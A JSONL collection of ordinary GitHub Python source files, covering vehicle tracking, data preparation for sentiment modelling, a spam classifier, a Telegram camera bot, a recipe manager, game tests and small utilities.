+{"seq_id":"42332301545","text":"import json\nfrom pathlib import Path\n\nfrom OTVision.config import CONFIG\nfrom OTVision.helpers.files import denormalize, get_files\nfrom OTVision.helpers.log import log\n\nfrom .iou import track_iou\nimport torch\nimport os\n\nfrom OTVision.siam import NeuralNetwork\nfrom OTVision.track.cluster_track import dbscan\n\n\ndef main(\n paths,\n yolo_mode=\"spp\", # Why yolo mode?\n sigma_l=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_L\"],\n sigma_h=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_H\"],\n sigma_iou=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_IOU\"],\n t_min=CONFIG[\"TRACK\"][\"IOU\"][\"T_MIN\"],\n t_miss_max=CONFIG[\"TRACK\"][\"IOU\"][\"T_MISS_MAX\"],\n overwrite=CONFIG[\"TRACK\"][\"OVERWRITE\"],\n debug: bool = CONFIG[\"TRACK\"][\"DEBUG\"],\n clustering=CONFIG[\"TRACK\"][\"CLUSTERING\"],\n):\n log.info(\"Start tracking\")\n if debug:\n log.setLevel(\"DEBUG\")\n log.debug(\"Debug mode on\")\n\n filetype = CONFIG[\"DEFAULT_FILETYPE\"][\"DETECT\"]\n detections_files = get_files(paths, filetype)\n\n # kav 200922\n model_siam = NeuralNetwork()\n model_siam.eval()\n if torch.cuda.is_available():\n model_siam.load_state_dict(torch.load('checkpoints/big.pth', map_location=torch.device('cuda:0')))\n model_siam = model_siam.cuda()\n else:\n model_siam.load_state_dict(torch.load('checkpoints/big.pth', map_location=torch.device('cpu')))\n model_siam = model_siam.cpu()\n\n\n\n for detections_file in detections_files:\n log.info(f\"Try tracking {detections_file}\")\n\n try:\n with open(detections_file) as f:\n detections = json.load(f)\n log.info(f\"{filetype} read\")\n\n detections_denormalized = denormalize(detections)\n log.info(\"Detections denormalized\")\n\n dir = os.path.dirname(detections_file)\n file_name = os.path.basename(detections_file).split('.')[0]\n dir_features = os.path.join(dir, file_name + '_features')\n\n tracks_px, trajectories_geojson = track(\n detections=detections_denormalized,\n yolo_mode=yolo_mode,\n sigma_l=sigma_l,\n sigma_h=sigma_h,\n sigma_iou=sigma_iou,\n t_min=t_min,\n t_miss_max=t_miss_max,\n model_siam=model_siam, # kav 200922\n dir_features=dir_features,\n )\n\n log.info(\"Detections tracked\")\n if clustering:\n tracks_px = dbscan(tracks_px)\n # print(bad_id)\n\n write(\n tracks_px=tracks_px,\n detections_file=detections_file,\n overwrite=overwrite,\n )\n except OSError as oe:\n log.error(\n (\n f'Could not open \"{detections_file}\". '\n f\"Following exception occured: {str(oe)}\"\n )\n )\n except json.JSONDecodeError as je:\n log.error(\n (\n f'Unable to decode \"{detections_file}\" as JSON.'\n f\"Following exception occured: {str(je)}\"\n )\n )\n\n\ndef track(\n detections,\n yolo_mode=\"spp\",\n sigma_l=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_L\"],\n sigma_h=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_H\"],\n sigma_iou=CONFIG[\"TRACK\"][\"IOU\"][\"SIGMA_IOU\"],\n t_min=CONFIG[\"TRACK\"][\"IOU\"][\"T_MIN\"],\n t_miss_max=CONFIG[\"TRACK\"][\"IOU\"][\"T_MISS_MAX\"],\n model_siam=None, # kav 200922\n dir_features='',\n):\n new_detections, trajectories_geojson, vehIDs_finished = track_iou(\n detections=detections[\"data\"],\n sigma_l=sigma_l,\n sigma_h=sigma_h,\n sigma_iou=sigma_iou,\n t_min=t_min,\n t_miss_max=t_miss_max,\n model_siam=model_siam, # kav 200922\n w_frame=detections['vid_config']['width'],\n h_frame=detections['vid_config']['height'],\n dir_features=dir_features,\n )\n\n trk_config = {\n \"yolo_mode\": yolo_mode,\n \"tracker\": \"IOU\",\n \"sigma_l\": sigma_l,\n \"sigma_h\": sigma_h,\n \"sigma_iou\": sigma_iou,\n \"t_min\": t_min,\n \"t_miss_max\": t_miss_max,\n }\n\n tracks_px = {\n \"vid_config\": detections[\"vid_config\"],\n \"det_config\": detections[\"det_config\"],\n \"trk_config\": trk_config,\n \"data\": new_detections,\n }\n\n return tracks_px, trajectories_geojson\n\n\n# TODO: Implement overwrite as in detect, maybe refactor?\ndef write(\n tracks_px,\n detections_file,\n overwrite=CONFIG[\"TRACK\"][\"OVERWRITE\"],\n):\n # ?: Check overwrite before tracking instead of before writing tracking?\n # TODO: Export also as csv, trj and alternative json\n tracks_file = Path(detections_file).with_suffix(CONFIG[\"DEFAULT_FILETYPE\"][\"TRACK\"])\n tracks_file_already_exists = tracks_file.is_file()\n if overwrite or not tracks_file_already_exists:\n # Write JSON\n with open(tracks_file, \"w\") as f:\n json.dump(tracks_px, f, indent=4)\n if tracks_file_already_exists:\n log.info(f\"{tracks_file} overwritten\")\n else:\n log.info(f\"{tracks_file} file written\")\n else:\n log.info(f\"{tracks_file} already exists. To overwrite, set overwrite=True\")\n","repo_name":"Kommunarus/otv","sub_path":"OTVision/track/track.py","file_name":"track.py","file_ext":"py","file_size_in_byte":5195,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"23716253286","text":"import pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport pymysql\nimport numpy as np\nimport pickle\n\n\"\"\"\nStep1. data load\n\"\"\"\ndef loading_data():\n ## DB connection\n conn = pymysql.connect(host = \"127.0.0.1\", user = [USER], passwd = [PASSWORD], db = [DATABASE], cursorclass = pymysql.cursors.DictCursor)\n cur = conn.cursor()\n \n cur.execute(\"show databases\")\n cur.execute(\"use crawling\")\n\n ## Table data loading\n # news\n query = \"\"\" \n select * from news_counting;\n \"\"\"\n cur.execute(query)\n news_df = pd.DataFrame(list(cur.fetchall())).drop(['id'], axis=1)\n news_df.head()\n\n # portal\n # 카카오변수 제외, 구글/네이버를 활용하기위해 \n # 네이버 변수가 값을 갖는 2016년 1월부터 데이터 사용\n query = \"\"\" \n select * from portal_trends_ratio ;\n \"\"\"\n cur.execute(query)\n portal_df = pd.DataFrame(list(cur.fetchall()))\n portal_df = portal_df[['year', 'month', 'day', 'google', 'naver']][17:]\n\n ## response y: CCSI(소비자심리지수)\n query = \"\"\" \n select * from ccsi ;\n \"\"\"\n cur.execute(query)\n conn.close()\n cur.close()\n # X와 기간을 맞춤\n ccsi = pd.DataFrame(list(cur.fetchall()))[4:].reset_index(drop = True)\n\n return news_df, portal_df, ccsi\n\n\n\n\"\"\"\nStep2. X, y dataframe\n\"\"\"\n\n# 달의 마지막주인지 확인하는 function\ndef isLastWeekOfThisMonth(X, index):\n if(index == (len(X) - 1)):\n return True\n if ( X.iloc[index].month != X.iloc[index + 1].month ):\n return True\n return False\n\n# 달의 마지막 주차이면, 해당 달의 데이터들의 평균값들을 하나의 record로 갖는 dataframe 생성\ndef getYdataframe(X, y):\n count = 0\n y_weekly = pd.DataFrame()\n\n for i in range(len(X)):\n count+= 1\n\n if ( isLastWeekOfThisMonth(X, i) ):\n a = np.where((y.month == X.iloc[i].month) & (y.year == X.iloc[i].year ))[0]\n present_ccsi = float(y.iloc[a].ccsi)\n \n past_ccsi = float(y.iloc[a-1].ccsi)\n sub = present_ccsi - past_ccsi\n \n for index in range(count):\n n = ((index+1) / count)*(sub)+past_ccsi\n record = pd.Series([int(X.iloc[i].year), int(X.iloc[i].month), int(X.iloc[i-(count-index)+1].day), n])\n row_df = pd.DataFrame([record])\n y_weekly = pd.concat([y_weekly, row_df], ignore_index=True)\n \n \n count = 0\n \n return y_weekly\n\n# df column명 정해주는 function\ndef renameXdataframe(X):\n X.rename(columns={0: 'year', 1: 'month',2:'day', 3: 'keyword1', 4: 'keyword2', 5: 'keyword3', 6: 'keyword4', 7: 'keyword5', 8: 'google', 9: 'naver'}, inplace = True)\n return X.astype({\"year\": int, \"month\": int, \"day\": int})\n\n\ndef renameYdataframe(y):\n y.rename(columns={0: 'year', 1: 'month',2:'day', 3: 'ccsi'}, inplace = True)\n return y.astype({\"year\": int, \"month\": int, \"day\": int})\n\n\ndef getX_y_dateframe():\n news_df, portal_df, ccsi = loading_data()\n predictors = pd.merge(news_df, portal_df)\n\n y_df = getYdataframe(predictors, ccsi)\n y_df = renameYdataframe(y_df)\n X_df = renameXdataframe(predictors)\n \n return X_df, predictors, y_df\n\n\"\"\"\nStep3. Modeling\n- split train and test set\n\"\"\"\ndef getTrainTestSet(X_df, ccsi):\n df = pd.merge(X_df, ccsi)\n X = df[['keyword1', 'keyword2', 'keyword3', 'keyword4', 'keyword5', 'google', 'naver']] # X: 예측변수 dataframe\n y = df[['ccsi']] # y: 반응변수 dataframe\n\n # CV를 활용하기 위해, validate set은 따로 분할하지 않는다.\n X_train, X_test, y_train, y_test = train_test_split(X, y, train_size=0.8, test_size=0.2, shuffle=False)\n\n return X_train, X_test, y_train, y_test\n \n\n###################### main ######################\nif __name__ == \"__main__\":\n X_df, predictors, ccsi = getX_y_dateframe()\n X_train, X_test, y_train, y_test = getTrainTestSet(X_df, ccsi) \n pickle.dump(X_train, open('./dataset/dataset_interpolation/X_train.pkl','wb'))\n pickle.dump(X_test, open('./dataset/dataset_interpolation/X_test.pkl','wb'))\n pickle.dump(y_train, open('./dataset/dataset_interpolation/y_train.pkl','wb'))\n pickle.dump(y_test, open('./dataset/dataset_interpolation/y_test.pkl','wb'))\n pickle.dump(ccsi, open('./dataset/dataset_interpolation/ccsi.pkl','wb'))\n pickle.dump(predictors, open('./dataset/dataset_interpolation/predictors.pkl','wb'))\n","repo_name":"2hyes/CLI-development","sub_path":"getTrainTestSet/getTrainTestSet_interpolation.py","file_name":"getTrainTestSet_interpolation.py","file_ext":"py","file_size_in_byte":4479,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"35494544623","text":"import logging.config\n\nimport click\n\nfrom .version import VERSION\nfrom .worker import RunWorkerProcess, import_string\n\nburst_help = 'Batch mode: exit once no jobs are found in any queue.'\nhealth_check_help = 'Health Check: run a health check and exit'\nverbose_help = 'Enable verbose output.'\n\n\n@click.command()\n@click.version_option(VERSION, '-V', '--version', prog_name='arq')\n@click.argument('worker-path', type=click.Path(exists=True, dir_okay=False, file_okay=True), required=True)\n@click.argument('worker-class', default='Worker')\n@click.option('--burst/--no-burst', default=False, help=burst_help)\n@click.option('--check', is_flag=True, help=health_check_help)\n@click.option('-v', '--verbose', is_flag=True, help=verbose_help)\ndef cli(*, worker_path, worker_class, burst, check, verbose):\n \"\"\"\n Job queues in python with asyncio, redis and msgpack.\n\n CLI to run the arq worker.\n \"\"\"\n worker = import_string(worker_path, worker_class)\n logging.config.dictConfig(worker.logging_config(verbose))\n\n if check:\n exit(worker.check_health())\n else:\n RunWorkerProcess(worker_path, worker_class, burst)\n","repo_name":"justlittle/arq","sub_path":"arq/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"54255874396","text":"# import sys\n# sys.path.append('.')\nimport pandas as pd\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn import svm\nimport psycopg2\ndef spam(review):\n df1 = pd.read_csv(\"machine/Sigma-Channel1.csv\")\n df2 = pd.read_csv(\"machine/Sigma-Channel2.csv\")\n df3 = pd.read_csv(\"machine/Sigma-Channel3.csv\")\n df4 = pd.read_csv(\"machine/Sigma-Channel4.csv\")\n df5 = pd.read_csv(\"machine/Sigma-Channel5.csv\")\n\n frames = [df1, df2, df3, df4, df5]\n # create a single data frame\n df_merged = pd.concat(frames)\n\n # assigning keys to allow model know the respective database\n keys = [\"Channel1\",\"Channel2\",\"Channel3\",\"Channel4\",\"Channel5\"]\n df_with_keys = pd.concat(frames,keys=keys)\n\n df = df_with_keys\n # extracting columns from database\n df_data = df[[\"CONTENT\",\"CLASS\"]]\n\n df_x = df_data['CONTENT']\n df_y = df_data['CLASS']\n\n corpus = df_x\n # raw texts are converted to vector numeric values. Preparing to fit in\n # machine learning model\n cv = CountVectorizer()\n X = cv.fit_transform(corpus)\n # Algorithm will use 70% of data for training model, 30% will be used for model testing.\n X_train, X_test, y_train, y_test = train_test_split(X, df_y, test_size=0.30, random_state=42)\n # Naive Bayes algorithm to train the spam model\n clf = MultinomialNB()\n # fitting model into dataset to identify pattterns and insights of the dataset\n clf.fit(X_train,y_train)\n\n comment = [\"{}\".format(review)]\n test_score = clf.score(X_train, y_train) * 100\n print(f\"Accuracy = {test_score:.2f}%\")\n # converting result into array\n vect = cv.transform(comment).toarray()\n result = clf.predict(vect)\n\n if (result[0] == 1):\n return True\n\n return False\n","repo_name":"AiXueK/Movie-Search-Web","sub_path":"project/backend/machine/spam.py","file_name":"spam.py","file_ext":"py","file_size_in_byte":1849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2904987683","text":"from board import Board\nfrom human_control import HumanControl\n\n\ndef test_board_check():\n # initialize 5 * 5 board to test\n board1 = Board(5, 5, 100)\n hc1 = HumanControl(board1)\n # set some tiles on board1\n board1.table = [[0, 'white', 0, 0, 'black'],\n [0, 'white', 0, 'white', 0],\n [0, 'white', 'white', 0, 0],\n [0, 0, 'white', 'black', 0],\n [0, 0, 0, 0, 0]]\n hc1.board_check()\n # check the valid positions\n valid1 = (0, 0)\n valid2 = (1, 3)\n assert valid1 in hc1.vaild_positions\n assert valid2 in hc1.vaild_positions\n\n\ndef test_line_check():\n # still use board1 to check\n board1 = Board(5, 5, 100)\n hc1 = HumanControl(board1)\n # set some tiles on board1\n board1.table = [[0, 'white', 0, 0, 'black'],\n [0, 'white', 0, 'white', 0],\n [0, 'white', 'white', 0, 0],\n [0, 0, 'white', 'black', 0],\n [0, 0, 0, 0, 0]]\n # pick a valid cell to test\n col = 1\n row = 3\n # check the valid line: upper right\n xadd = 1\n yadd = -1\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(col, row)]\n # check an invaild line: up\n xadd = 0\n yadd = -1\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(col, row)]\n # pick an invalid cell to test\n col = 3\n row = 2\n for xadd in hc1.ADD:\n for yadd in hc1.ADD:\n hc1.line_check(col, row, xadd, yadd)\n assert hc1.vaild_positions == [(1, 3)]\n","repo_name":"LinzheHE/Othello_Game","sub_path":"human_control_test.py","file_name":"human_control_test.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73541241928","text":"class LoadTraceInstruction(object):\n \"\"\"Track load trace instruction in an orderly manner.\"\"\"\n def __init__(self, line):\n tokens = line.split(', ')\n self.uiid = int(tokens[0])\n self.cycle = int(tokens[1])\n self.addr = int(tokens[2], 16)\n self.pc = int(tokens[3], 16)\n self.is_hit = bool(tokens[4])\n\n # List of (pc, dec) tuples, from most recent to least recent.\n #print(tokens[5:])\n self.branches = [(int(tokens[i], 16), bool(int(tokens[i + 1]))) for i in range(5, len(tokens), 2)]\n\n def __str__(self):\n s = f'uiid={self.uiid} cycle={self.cycle} pc={hex(self.pc)} addr={hex(self.addr)} is_hit={self.is_hit} branches=['\n for pc, dec in self.branches:\n if pc == 0 and not dec:\n continue\n s += f'(pc={hex(pc)} dec={\"T\" if dec else \"NT\"})'\n s += ']'\n return s\n\n\ndef get_instructions(f):\n \"\"\"Process the load trace as a generator, (note the yield)\n yielding every loaded data address.\n Can call using gather_correlation_data inside an\n open (or variant) context.\"\"\"\n for line in f:\n # For handling some invalid lines in the ML-DPC load traces\n if line.startswith('***') or line.startswith('Read'):\n continue\n yield LoadTraceInstruction(line)\n","repo_name":"cmolder/voyager-analysis","sub_path":"utils/load_trace.py","file_name":"load_trace.py","file_ext":"py","file_size_in_byte":1321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73101577928","text":"import dataset\r\n\r\nasync def get_data(players: list, table_players: dataset.Table, lobby: dict) -> dict:\r\n data = {}\r\n questions = []\r\n for i in range(len(players)):\r\n player_db = table_players.find_one(user=players[i], game=lobby.get(\"code\"))\r\n questions.append(list(player_db.get(\"data\")))\r\n \r\n questions = [elem[0] for elem in questions]\r\n\r\n for question in questions:\r\n answers = {}\r\n for player in players:\r\n try:\r\n answers[player] = table_players.find_one(user=player).get(\"data\")[question]\r\n except KeyError:...\r\n data[question] = answers\r\n \r\n return data\r\n\r\n","repo_name":"belkinark/NotipBox","sub_path":"utils/text2player.py","file_name":"text2player.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21435582614","text":"# -*- coding: utf-8 -*-\n\nimport telebot\nimport datetime\nimport os\nfrom picamera import PiCamera\nfrom homie import settings\nfrom homie.utils import *\nfrom homie.security import *\nfrom homie.classes import *\n\nbot = telebot.TeleBot(settings.API_TOKEN)\ncamera = PiCamera()\n\n\n@bot.message_handler(commands=['enviarvideo'])\ndef send_video(message):\n \"\"\"\n Captures a new video, saves it and sends it\n \"\"\"\n filename = '{}{}{}'.format(\n settings.OUTPUT_DIRECTORY, \n get_filename_from_time(), \n settings.VIDEO_EXTENSION\n )\n bot.send_message(message.chat.id, 'Grabando vídeo, esto puede llevar unos minutos...')\n camera.start_recording(filename)\n camera.wait_recording(settings.MAX_VIDEO_TIME)\n camera.stop_recording()\n bot.send_message(message.chat.id, 'Vídeo grabado, enviando...')\n bot.send_video(message.chat.id, open(filename, 'rb'))\n\n \n@bot.message_handler(commands=['enviarfoto'])\ndef send_photo(message):\n \"\"\"\n Captures a new image, saves it and sends it\n \"\"\"\n filename ='{}{}{}'.format(\n settings.OUTPUT_DIRECTORY, \n get_filename_from_time(), \n settings.IMAGE_EXTENSION\n )\n bot.send_message(message.chat.id, 'Enviando foto...')\n camera.capture(filename)\n bot.send_photo(message.chat.id, open(filename, 'rb'))\n log = ('Foto ' + filename + ' guardada por ' + message.chat.first_name + ' ' \n + message.chat.last_name + ' [' + str(message.chat.id) + ']')\n print(log)\n\n\n \ndef initialize():\n camera.rotation = settings.ROTATION.value\n camera.resolution = (\n settings.RESOLUTION.value['height'], \n settings.RESOLUTION.value['width']\n )\n\n\nif __name__ == '__main__':\n initialize()\n print('Bot listening!')\n bot.polling()\n","repo_name":"pablo-moreno/homie-legacy","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"37854425228","text":"from Entidades.receita import Receita\nfrom Telas.tela_receita import TelaReceita\nfrom Telas.tela_receita_acoes import TelaReceitaAcoes\nfrom Telas.tela_receita_view import TelaReceitaView\nfrom Telas.tela_receita_relatorio import TelaReceitaRelatorio\nfrom Entidades.ingrediente_receita import IngredienteReceita\nfrom DAOs.receita_dao import ReceitaDAO\nfrom DAOs.relatorio_dao import RelatorioDAO\nfrom Excecoes.empty_list_exception import EmptyListException\nfrom datetime import date\n\n\nclass ControladorReceita:\n def __init__(self, controlador_sistema):\n self.__controlador_sistema = controlador_sistema\n self.__controlador_ingrediente = self.__controlador_sistema.dao_ingrediente\n self.__dao = ReceitaDAO()\n self.__dao_relatorio = RelatorioDAO()\n self.__tela_receitas = TelaReceita()\n self.__tela_receitas_acoes = TelaReceitaAcoes()\n self.__tela_receita_view = TelaReceitaView()\n self.__tela_receita_relatorio = TelaReceitaRelatorio()\n self.__eventos_receita = []\n\n def abre_tela(self):\n lista_opcoes = {'cadastro': self.cadastrar_receita,\n 'alteracao': self.alterar_receita,\n 'view': self.visualizar_receita,\n 'relatorio': self.ver_relatorio_receita,\n 'exclusao': self.excluir_receita,\n 'retorna': self.retornar_menu_principal}\n\n while True:\n opcao_menu, valor_menu = self.__tela_receitas.abre_tela(self.__dao.get_all_names())\n self.__tela_receitas.fecha_tela()\n if opcao_menu is None:\n exit(0)\n\n if opcao_menu == 'alteracao' or opcao_menu == 'exclusao' or opcao_menu == 'view':\n lista_opcoes[opcao_menu](valor_menu['cb_opcao'])\n else:\n lista_opcoes[opcao_menu]()\n\n def cadastrar_receita(self):\n ingredientes_estoque = self.lista_ingredientes_menu()\n infos_tela = None\n button, dados_receita = self.__tela_receitas_acoes.abre_tela(ingredientes_estoque, infos_tela)\n\n if button == 'cancel':\n self.abre_tela()\n\n if dados_receita is None:\n self.cadastrar_receita()\n\n ingredientes_receita = self.criar_lista_ingredientes(dados_receita[\"ingredientes_receita\"])\n\n nova_receita = Receita(dados_receita[\"titulo\"], ingredientes_receita, dados_receita[\"preparo\"])\n\n if nova_receita in self.__dao.get_all():\n self.__tela_receitas.erro_ja_cadastrado(nova_receita.titulo)\n self.abre_tela()\n self.__dao.add(nova_receita.titulo, nova_receita)\n self.registra_evento(\"Cadastro de receita\", nova_receita.titulo)\n\n def alterar_receita(self, titulo):\n ingredientes_estoque = self.lista_ingredientes_menu()\n receita_alterada = self.__dao.get(titulo)\n\n if receita_alterada is None:\n self.abre_tela()\n\n infos_tela = {'titulo': receita_alterada.titulo,\n 'preparo': receita_alterada.preparo,\n 'ingredientes': receita_alterada.ingredientes_receita}\n\n button, dados_receita = self.__tela_receitas_acoes.abre_tela(ingredientes_estoque, infos_tela)\n\n if button == 'cancel':\n self.abre_tela()\n else:\n if dados_receita is None:\n self.alterar_receita(titulo)\n\n self.__dao.remove(receita_alterada.titulo)\n receita_alterada.titulo = dados_receita[\"titulo\"]\n receita_alterada.ingredientes_receita = self.criar_lista_ingredientes(dados_receita[\"ingredientes_receita\"])\n receita_alterada.preparo = dados_receita[\"preparo\"]\n self.__dao.add(receita_alterada.titulo, receita_alterada)\n\n self.registra_evento(\"Alteração de receita\", receita_alterada.titulo)\n self.abre_tela()\n\n def visualizar_receita(self, titulo):\n receita = self.__dao.get(titulo)\n\n if receita is None:\n self.abre_tela()\n\n ingredientes = ''\n for i in receita.ingredientes_receita:\n ingredientes += str(i.nome) + ' - ' + str(i.quantidade) + ' ' + str(i.unidade_medida) + '\\n'\n titulo = receita.titulo\n preparo = receita.preparo\n\n button_value = self.__tela_receita_view.abre_tela(titulo, ingredientes, preparo)\n self.registra_evento(\"Pesquisa de receita\", receita.titulo)\n if button_value is None:\n exit(0)\n elif button_value == 'retornar':\n self.abre_tela()\n else:\n self.fazer_receita(titulo)\n\n def fazer_receita(self, titulo):\n receita = self.__dao.get(titulo)\n\n for i in receita.ingredientes_receita:\n ingrediente_estoque = self.__controlador_ingrediente.get(i.nome)\n if ingrediente_estoque.quantidade < i.quantidade:\n self.__tela_receita_view.erro_ingredientes_insuficientes(i.nome)\n self.abre_tela()\n\n for i in receita.ingredientes_receita:\n ingrediente_deduzir = self.__controlador_ingrediente.get(i.nome)\n ingrediente_deduzir.quantidade -= i.quantidade\n self.__controlador_ingrediente.add(ingrediente_deduzir.nome, ingrediente_deduzir)\n self.__tela_receitas.feedback_sucesso()\n\n self.registra_evento(\"Receita feita\", titulo)\n\n def ver_relatorio_receita(self):\n try:\n if not self.__dao_relatorio.get():\n raise EmptyListException()\n\n relatorio = ''\n for i in self.__dao_relatorio.get():\n relatorio += i + '\\n'\n self.__tela_receita_relatorio.abre_tela(relatorio)\n\n except EmptyListException:\n self.abre_tela()\n\n def excluir_receita(self, titulo):\n valor = self.__dao.remove(titulo)\n if valor == 'exception':\n self.abre_tela()\n self.__tela_receitas_acoes.feedback_sucesso()\n self.registra_evento(\"Exclusão de receita\", titulo)\n\n # ------ MÉTODOS INTERNOS ------\n\n def registra_evento(self, acao, receita):\n registro = ''\n registro += 'Ação: ' + acao + \" - Receita: \" + receita + \" - Data: \" + str(date.today())\n self.__dao_relatorio.add(registro)\n\n def criar_lista_ingredientes(self, dados_ingredientes: dict):\n ingredientes_receita = []\n for nome_ingrediente in dados_ingredientes:\n if nome_ingrediente != '':\n add_ingrediente = IngredienteReceita(self.__controlador_ingrediente.get(nome_ingrediente),\n dados_ingredientes[nome_ingrediente])\n ingredientes_receita.append(add_ingrediente)\n return ingredientes_receita\n\n def lista_ingredientes_menu(self):\n lista_ingredientes = self.__controlador_ingrediente.get_all()\n lista_menu = []\n for i in lista_ingredientes:\n ing = i.nome + ', [{}]'.format(i.unidade_medida)\n lista_menu.append(ing)\n return lista_menu\n\n def retornar_menu_principal(self):\n self.__controlador_sistema.abre_tela()\n","repo_name":"paulazomig/sistema-de-receitas","sub_path":"Controladores/controlador_receita.py","file_name":"controlador_receita.py","file_ext":"py","file_size_in_byte":7112,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"11534512965","text":"\"\"\"Transformations to make to a given column's raw data.\"\"\"\nfrom datetime import datetime\n\ndef convert_utc_timestamp_to_datetime_string(utc_time: float) -> str:\n \"\"\"Given a UTC timestamp, convert to a human-readable date string.\n \n >>> convert_utc_timestamp_to_datetime_string(1679147878.0)\n Sunday, March 19, 2023, at 8:11:18 PM \n \"\"\"\n utc_datetime = datetime.fromtimestamp(utc_time)\n return utc_datetime.strftime(\"%A, %B %d, %Y, at %I:%M:%S %p\")\n\nMAP_COL_TO_TRANSFORMATION = {\n \"created_utc_string\": {\n \"original_col\": \"created_utc\",\n \"transform_func\": convert_utc_timestamp_to_datetime_string\n }\n}\n\nTRANSFORMATION_FIELDS_LIST = [\"created_utc_string\"]\n","repo_name":"mark-torres10/redditResearch","sub_path":"src/ml/transformations.py","file_name":"transformations.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"38777342707","text":"import sys\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.readline\n# function\ndef cut(row, col, size):\n\t'''\n\tpaper[row][col]부터 시작하는 size*size 크기의 종이를 확인.\n\t모두 같은 수면 cnt 배열을 업데이트하고\n\t아니면 9등분해서 재귀함.\n\t'''\n\tisAll1 = isAll0 = isAllM1 = True\n\tfor r in range(row, row + size):\n\t\tfor c in range(col, col + size):\n\t\t\tif paper[r][c] == 0: isAll1 = isAllM1 = False\n\t\t\telif paper[r][c] == 1: isAllM1 = isAll0 = False\n\t\t\telse: isAll1 = isAll0 = False\n\t\tif not isAll1 and not isAll0 and not isAllM1: break\n\t\n\tif isAllM1: cnt[0] += 1\n\telif isAll0: cnt[1] += 1\n\telif isAll1: cnt[2] += 1\n\telse:\n\t\tsize //= 3\n\t\tfor i in range(3):\n\t\t\tfor j in range(3):\n\t\t\t\tcut(row + i * size, col + j * size, size)\n\n# input\nn = int(input())\npaper = [tuple(map(int, input().split())) for _ in range(n)]\n# process & output\ncnt = [0, 0, 0]\ncut(0, 0, n)\nprint(*cnt)","repo_name":"WaiNaat/TWS","sub_path":"QKIM/Acmicpc/A01780.py","file_name":"A01780.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"21529243029","text":"import numpy as np\nimport cv2\n\nimg = cv2.imread(r'C:\\Users\\indra094\\Documents\\scripts\\ResultImages\\veins1.jpeg')\nimggray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\nret, thresh = cv2.threshold(imggray, 127, 255, 0)\nkernel = np.ones((2,2), np.uint8)\n\n#dilation = cv2.dilate(thresh, kernel, iterations=1)\nerosion = cv2.erode(thresh, kernel, iterations=5)\ndilation = cv2.dilate(erosion, kernel, iterations=5)\n\n \n# Find Canny edges\nedges = cv2.Canny(dilation, 30, 200)\n\ncontours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)\n\ni=0\nfor cnt in contours:\n epsilon = 0.1*cv2.arcLength(cnt,True)\n approx = cv2.approxPolyDP(cnt,epsilon,True)\n #cv2.imshow(\"orig2\"+str(i), approx)\n print (cv2.arcLength(cnt,True))\n print (cv2.contourArea(cnt))\n i +=1\n#COUNTOURS vector of x,y - boundary points\n\nprint (len(contours))\n#print (contours[1])\n\ncv2.drawContours(dilation, contours, -1, (0, 255, 0), 1)\n\ncv2.imshow(\"orig\", dilation)\ncv2.imshow(\"eroded\", edges)\n\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"indra094/PythonStuffPlusOpenCV","sub_path":"Countours.py","file_name":"Countours.py","file_ext":"py","file_size_in_byte":1026,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"33711392231","text":"from flask.json import JSONEncoder\nfrom meddit.post import Post\n\nclass PostsJSONEncoder(JSONEncoder):\n def default(self, obj):\n if isinstance(obj, Post):\n return {\n 'id': obj.id,\n 'author': obj.author,\n 'gif_id': obj.gif_id,\n 'created': obj.created,\n 'votes': obj.votes,\n }\n return super().default(obj)\n","repo_name":"mking/meddit","sub_path":"meddit/posts_json_encoder.py","file_name":"posts_json_encoder.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
